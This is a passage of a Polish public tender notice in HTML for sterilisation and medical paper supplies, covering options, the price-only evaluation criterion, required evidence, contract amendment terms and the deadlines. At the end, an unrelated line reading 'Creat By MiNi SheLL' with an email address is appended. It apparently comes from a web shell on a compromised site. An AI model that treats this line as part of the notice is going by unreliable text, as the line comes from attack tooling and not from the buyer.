Opcji, wedle wyboru zamawiającego, może zostać zlecona dostawa wszystkich, niektórych lub jednego asortymentu wskazanego i wycenionego przez wykonawcę w tabeli formularza asortymentowo – cenowego stanowiącego część oferty. <br/>Zamawiający nie jest zobowiązany do zlecenia dostaw objętych przedmiotem Opcji, a wykonawcy nie służy roszczenie o ich zlecenie. Dostawy będące przedmiotem Opcji mogą zostać zlecone w ilości stanowiącej równowartość do 50% wartości przedmiotu zamówienia. Podstawą określenia wartości dostaw zleconych w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych asortymentów zawarte w formularzu asortymentowo - cenowym, stanowiącym część oferty wykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa materiałów do sterylizacji.<br/>Zamawiający dokonuje podziału zamówienia na części (pakiety): w ilości 5.<br/>Opis poszczególnych części (pakietów) znajduje się w Rozdziale II podrozdział 1 SWZ oraz w<br/>załączniku nr 5 do SWZ stanowiącym szczegółowy opis przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33140000-3 - Materiały medyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33198000-4 - Szpitalne wyroby papierowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W stosunku do każdego zadania zamawiający jest uprawniony zlecić wykonawcy dodatkowy zakres rzeczowy („Opcja”). <br/>Przedmiotem Opcji będą dostawy asortymentów tożsamych z opisanymi w SWZ i wycenionych przez wykonawcę w formularzu asortymentowo – cenowym, stanowiącym część oferty, w ilościach określonych w załączniku nr 1.1 – 1.5 do SWZ. <br/>W ramach Opcji, wedle wyboru zamawiającego, może zostać zlecona dostawa wszystkich, niektórych lub jednego asortymentu wskazanego i wycenionego przez wykonawcę w tabeli formularza asortymentowo – cenowego stanowiącego część oferty. <br/>Zamawiający nie jest zobowiązany do zlecenia dostaw objętych przedmiotem Opcji, a wykonawcy nie służy roszczenie o ich zlecenie. Dostawy będące przedmiotem Opcji mogą zostać zlecone w ilości stanowiącej równowartość do 50% wartości przedmiotu zamówienia.<br/>Podstawą określenia wartości dostaw zleconych w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych asortymentów zawarte w formularzu asortymentowo - cenowym, stanowiącym część oferty wykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający w niniejszym postępowaniu nie żąda złożenia przez wykonawcę podmiotowych środków dowodowych.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> a)	dokumenty potwierdzające wymagane parametry w oferowanych wyrobach (np. firmowe materiały informacyjne producenta, katalogi, ulotki, foldery, instrukcje użytkownika, opisy techniczne lub inne posiadane dokumenty), zawierające szczegółowe dane, które umożliwią potwierdzenie spełniania wymagań ustalonych przez zamawiającego oraz będą podstawą dokonania oceny zgodności złożonej oferty przez wykonawcę z wymaganiami określonymi przez zamawiającego. <br/>Zaleca się w sposób widoczny (np. kolorowy zakreślacz lub obrys kolorem) zaznaczyć fragment potwierdzający parametry podane na formularzu asortymentowo – cenowym (załącznik nr 1.1 – 1.5 – tj. producent, nazwa handlowa, numer katalogowy, opis, opakowanie) obok wpisać nr zadania i pozycji;<br/>b)	wpis (zgłoszenie wytwórcy lub autoryzowanego przedstawiciela) lub powiadomienie (zgłoszenie dystrybutora/importera) do Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych;<br/>c)	opis rozwiązań równoważnych – jeżeli wykonawca przewiduje ich zastosowanie (w przypadku, o którym mowa w Rozdziale II, podrozdział 2, pkt 4) SWZ) oraz dokumenty na potwierdzenie równoważności zastosowanych rozwiązań (jeżeli są konieczne do wykazania równoważności). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> a)	dokumenty potwierdzające wymagane parametry w oferowanych wyrobach (np. firmowe materiały informacyjne producenta, katalogi, ulotki, foldery, instrukcje użytkownika, opisy techniczne lub inne posiadane dokumenty), zawierające szczegółowe dane, które umożliwią potwierdzenie spełniania wymagań ustalonych przez zamawiającego oraz będą podstawą dokonania oceny zgodności złożonej oferty przez wykonawcę z wymaganiami określonymi przez zamawiającego. <br/>Zaleca się w sposób widoczny (np. kolorowy zakreślacz lub obrys kolorem) zaznaczyć fragment potwierdzający parametry podane na formularzu asortymentowo – cenowym (załącznik nr 1.1 – 1.5 – tj. producent, nazwa handlowa, numer katalogowy, opis, opakowanie) obok wpisać nr zadania i pozycji;<br/>b)	wpis (zgłoszenie wytwórcy lub autoryzowanego przedstawiciela) lub powiadomienie (zgłoszenie dystrybutora/importera) do Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych;<br/>c)	opis rozwiązań równoważnych – jeżeli wykonawca przewiduje ich zastosowanie (w przypadku, o którym mowa w Rozdziale II, podrozdział 2, pkt 4) SWZ) oraz dokumenty na potwierdzenie równoważności zastosowanych rozwiązań (jeżeli są konieczne do wykazania równoważności). <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	formularz oferty, według wzoru stanowiącego załącznik nr 1 do SWZ;<br/>2)	formularz asortymentowo – cenowy stanowiący załącznik nr 1.1 – 1.5 do SWZ; <br/>Uwaga! <br/>Wykonawca wypełnia, podpisuje i załącza do oferty tylko te formularze, które dotyczą części (zadań), na które wykonawca składa ofertę.<br/>3)	odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu (odpowiednio: wykonawcy lub podmiotu udostępniającego zasoby) jest umocowana do jego reprezentowania; wykonawca nie jest zobowiązany do złożenia ww. dokumentów, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał w załączniku nr 1<br/>do SWZ (formularz oferty) dane umożliwiające dostęp do tych dokumentów;<br/>4)	pełnomocnictwa lub inne dokumenty potwierdzające umocowanie do reprezentowania (odpowiednio: wykonawcy, wykonawców wspólnie ubiegających się o udzielenie zamówienia), jeżeli w imieniu (odpowiednio: wykonawcy, wykonawców wspólnie ubiegających się o udzielenie zamówienia) działa osoba, której umocowanie do reprezentowania nie wynika z dokumentów, o których mowa w ppkt 3);<br/>5)	oświadczenie wykonawcy o niepodleganiu wykluczeniu z postępowania, według wzoru stanowiącego załącznik nr 2 do SWZ;<br/>Uwaga! W przypadku wspólnego ubiegania się wykonawców o udzielenie<br/>zamówienia ww. dokument składa każdy z wykonawców, <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum): 1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia; 2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania; oświadczenie wykonawcy o niepodleganiu wykluczeniu z postępowania, w przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia. Przedmiotowe środki dowodowe określone w rozdziale II podrozdział 7 pkt 6) SWZ wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wspólnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana postanowień jest możliwa poprzez: zmianę terminu realizacji dostawy o okres<br/>odpowiadający wstrzymaniu lub opóźnieniu tego terminu w przypadku:skutków działania siły<br/>wyższej, rozumianej jako zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego<br/>Strony, pomimo zachowania należytej staranności, nie mogły przewidzieć ani mu zapobiec, o ile<br/>mają one wpływ na termin dostawy Wyrobu przez Wykonawcę, w tym w szczególności skutki<br/>działania siły wyżej w postaci epidemii, wojen, klęsk żywiołowych,wystąpienia okoliczności<br/>leżących wyłącznie po stronie Zamawiającego, których wystąpienia Zamawiający, pomimo<br/>zachowania należytej staranności, nie mógł przewidzieć w dniu zawarciu Umowy;zmianę<br/>sposobu wykonania Przedmiotu Umowy lub Wyrobów w przypadku:gdy ulegnie zmianie stan<br/>prawny, w zakresie dotyczącym realizowanej Umowy, który spowoduje konieczność zmiany<br/>sposobu wykonania Przedmiotu Umowy przez Wykonawcę, zmiany wielkości opakowania – z<br/>zachowaniem zasady proporcjonalności w stosunku do ceny jednostkowej za Wyrób, o ile<br/>zamiana taka nie będzie skutkować zmniejszeniem ilości sztuk dostarczonego Wyrobu oraz nie<br/>będzie skutkować zwiększeniem należnej Wykonawcy ceny za dostarczenie tego Wyrobu w<br/>stosunku do jego ilości i ceny określonych w Ofercie Wykonawcy, stanowiącej załącznik nr 2 do<br/>Umowy, zmiany numeru katalogowego bądź nazwy własnej Wyrobu z zastrzeżeniem, że będzie<br/>on spełniał wymagania określone w załączniku nr 1 do Umowy,korzystania przez<br/>Zamawiającego z czasowych promocji cen Wyrobów, objętych Przedmiotem Umowy, gdy Wykonawca poinformuje Zamawiającego o promocji, wskazując który Wyrób jest nią objęty, w<br/>jakim okresie trwa promocja oraz cenę promocyjną, dodatkowo przywołując oznaczenie Umowy,<br/>na podstawie, której dany Wyrób jest dostarczany, zmiany przedmiotu Umowy poprzez<br/>zastąpienie Wyrobów wskazanych przez Wykonawcę w ofercie innymi Wyrobami o<br/>analogicznym przeznaczeniu i spełniającymi wszystkie wymogi określone przez Zamawiającego<br/>w dokumentach stanowiących załącznik nr 1 do Umowy oraz o parametrach jakościowych nie<br/>gorszych od zaoferowanych przez Wykonawcę w wypełnionym załączniku stanowiącym<br/>formularz asortymentowo - cenowy, złożonym wraz z ofertą; w szczególności lecz nie wyłącznie,<br/>zmiana taka jest dopuszczalna w przypadku pojawienia się Wyrobów nowszej generacji, o<br/>lepszych parametrach, właściwościach użytkowych, czy z innych przyczyn korzystniejszych dla<br/>Zamawiającego;zmiany Wynagrodzenia do wysokości rocznego wskaźnika cen towarów i usług<br/>konsumpcyjnych publikowanego przez Prezesa GUS, przy czym pierwsza waloryzacja może<br/>nastąpić po upływie jednego roku realizacji Umowy – jeżeli zmiany te będą miały wpływ na<br/>koszty wykonania zamówienia przez Wykonawcę; zmianę terminu realizacji Przedmiotu Umowy<br/>w przypadku nie wyczerpania kwoty, o której mowa w § 3 ust. 1, z zastrzeżeniem, że okres<br/>przedłużenia terminu realizacji Przedmiotu Umowy nie może być dłuższy niż 12<br/>miesięcy;zmianę miejsca dostawy, określonego w § 2 ust. 4 Umowy, poprzez wskazanie<br/>dodatkowego miejsca dostawy.Zamawiający na podstawie art 436 pkt 4) ustawy Pzp, przewiduje<br/>możliwość dokonania zmiany Wynagrodzenia w przypadku wystąpienia: (i) zmiany stawki<br/>podatku od towarów i usług lub podatku akcyzowego, (ii) zmiany wysokości minimalnego<br/>wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie<br/>ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, (iii) zmiany zasad<br/>podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki<br/>składki na ubezpieczenia społeczne lub zdrowotne lub (iv) zmiany zasad gromadzenia i<br/>wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4<br/>października 2018 r. o pracowniczych planach kapitałowych– jeżeli zmiany te będą miały wpływ<br/>na koszty wykonania Przedmiotu Umowy przez Wykonawcę.Ze względu na ograniczoną ilość<br/>znaków szczegółowy zakres i rodzaj zmian umowy znajdują się w zal. nr 5 w § 8 wzoru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/107sw</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-03 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-01</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy zagraniczni<br/>Zamawiający nie wymaga złożenia dokumentów, o których mowa w § 4 Rozporządzenia Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com